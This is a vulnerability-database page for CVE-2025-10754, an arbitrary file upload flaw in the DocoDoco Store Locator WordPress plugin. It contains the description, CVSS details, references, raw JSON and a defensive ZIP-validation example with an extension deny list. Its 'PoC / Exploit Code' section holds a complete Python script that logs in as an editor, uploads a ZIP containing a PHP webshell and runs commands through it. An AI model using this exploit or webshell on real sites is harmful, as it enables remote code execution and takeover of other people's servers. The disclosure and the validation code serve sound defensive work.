Security Vulnerability Report
CVE-2025-10754 CVSS 7.2 HIGH

CVE-2025-10754

Published: 2025-10-15 09:15:42
Last Modified: 2026-04-15 00:35:42

Description

The DocoDoco Store Locator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
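The weakness class here (CWE-434, unrestricted upload) comes down to the archive's entries never being checked before extraction. The following is an added example of the validation step a ZIP upload handler should perform, written from the defender's side; it is not the plugin's code and not part of the original record. The extension allow-list, the `build_zip` test helper and the sample archives are constructed for this example; a real plugin would extract only after `validate_zip_entries` returns an empty list, and would extract into a directory that the web server does not execute scripts from.

```python
import io
import posixpath
import zipfile

# Allow-list of entry types a store-locator import plausibly needs.
# This list is an assumption for the example, not the plugin's real policy.
ALLOWED_EXTENSIONS = {".csv", ".json", ".txt", ".png", ".jpg", ".jpeg", ".gif"}

# Suffixes that must never appear anywhere in an entry name (also catches
# double extensions such as "a.php.png" and dotfiles such as ".htaccess").
SERVER_EXECUTABLE = {".php", ".phtml", ".php3", ".php4", ".php5",
                     ".php7", ".phar", ".htaccess"}


def validate_zip_entries(zip_bytes: bytes, allowed=ALLOWED_EXTENSIONS):
    """Inspect every entry of a ZIP upload before anything is extracted.

    Returns a list of rejection reasons; an empty list means the archive
    passed. The function extracts nothing itself.
    """
    problems = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    with zf:
        for info in zf.infolist():
            name = info.filename
            # Reject absolute paths, backslashes, NUL bytes and '..' components
            # so an entry cannot land outside the extraction directory.
            if (name.startswith("/") or "\\" in name or "\x00" in name
                    or ".." in posixpath.normpath(name).split("/")):
                problems.append(f"{name}: unsafe path")
                continue
            if info.is_dir():
                continue
            base = posixpath.basename(name).lower()
            suffixes = ["." + part for part in base.split(".")[1:]]
            if any(s in SERVER_EXECUTABLE for s in suffixes):
                problems.append(f"{name}: server-executable file type")
            elif not suffixes or suffixes[-1] not in allowed:
                problems.append(f"{name}: extension not on allow-list")
    return problems


def build_zip(entries):
    """Construct an in-memory ZIP from {entry_name: bytes} (test input only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample archives: one clean import, one carrying a PHP
    # entry, a double-extension entry and a traversal entry.
    clean = build_zip({"stores.csv": b"id,name\n", "img/logo.png": b"\x89PNG"})
    hostile = build_zip({"stores.csv": b"id\n", "shell.php": b"<?php",
                         "a.php.png": b"", "../up.txt": b""})
    print("clean archive:", validate_zip_entries(clean) or "accepted")
    for reason in validate_zip_entries(hostile):
        print("hostile archive rejected:", reason)
```

The check deliberately walks every suffix of the basename rather than only the last one, because `a.php.png` passes a last-extension test yet is still executed as PHP by some server configurations; the path test runs before the extension test so a traversal entry is rejected regardless of its name.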

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DocoDoco Store Locator for WordPress <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10754 PoC - DocoDoco Store Locator Arbitrary File Upload
# Exploit: Upload malicious PHP file via ZIP upload functionality

import requests
import zipfile
import io
import os

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "editor_user"
PASSWORD = "editor_password"

# Step 1: Create malicious PHP webshell
webshell_content = b"""<?php
// Webshell for demonstrating RCE
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""

# Step 2: Create ZIP file containing the webshell
def create_malicious_zip():
    zip_buffer = io.BytesIO()
    with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Place PHP shell inside the ZIP with a .php extension
        zf.writestr("shell.php", webshell_content)
    zip_buffer.seek(0)
    return zip_buffer

# Step 3: Authenticate to WordPress as Editor
session = requests.Session()
login_url = f"{TARGET_URL}/wp-login.php"

# Get login form first (to retrieve any nonce tokens)
resp = session.get(login_url)

# Submit login credentials
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data, cookies={"wordpress_logged_in_": "test"})

# Step 4: Navigate to the DocoDoco Store Locator ZIP upload page
upload_url = f"{TARGET_URL}/wp-admin/admin.php?page=docodoco-store-locator"

# Step 5: Upload the malicious ZIP file
zip_data = create_malicious_zip()
files = {
    "zip_file": ("exploit.zip", zip_data, "application/zip")
}
# The plugin endpoint processes ZIP uploads without validating file types inside
upload_resp = session.post(upload_url, files=files)

# Step 6: Access the uploaded webshell
# The shell.php is extracted to a web-accessible directory
shell_url = f"{TARGET_URL}/wp-content/uploads/docodoco/shell.php?cmd=id"
shell_resp = requests.get(shell_url)

if shell_resp.status_code == 200:
    print(f"[+] RCE successful! Output: {shell_resp.text}")
else:
    print("[-] Exploit failed, check target configuration")

References

https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L187
https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L275
https://www.wordfence.com/threat-intel/vulnerabilities/id/14759eb0-455f-4b7d-abab-4e4d89b32bb1?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10754", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:41.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DocoDoco Store Locator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the zip upload functionality in all versions up to, and including, 1.0.1. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L187", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/docodoco-store-locator/tags/1.0.1/includes/Admin/ZIP.php#L275", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/14759eb0-455f-4b7d-abab-4e4d89b32bb1?source=cve", "source": "[email protected]"}]}}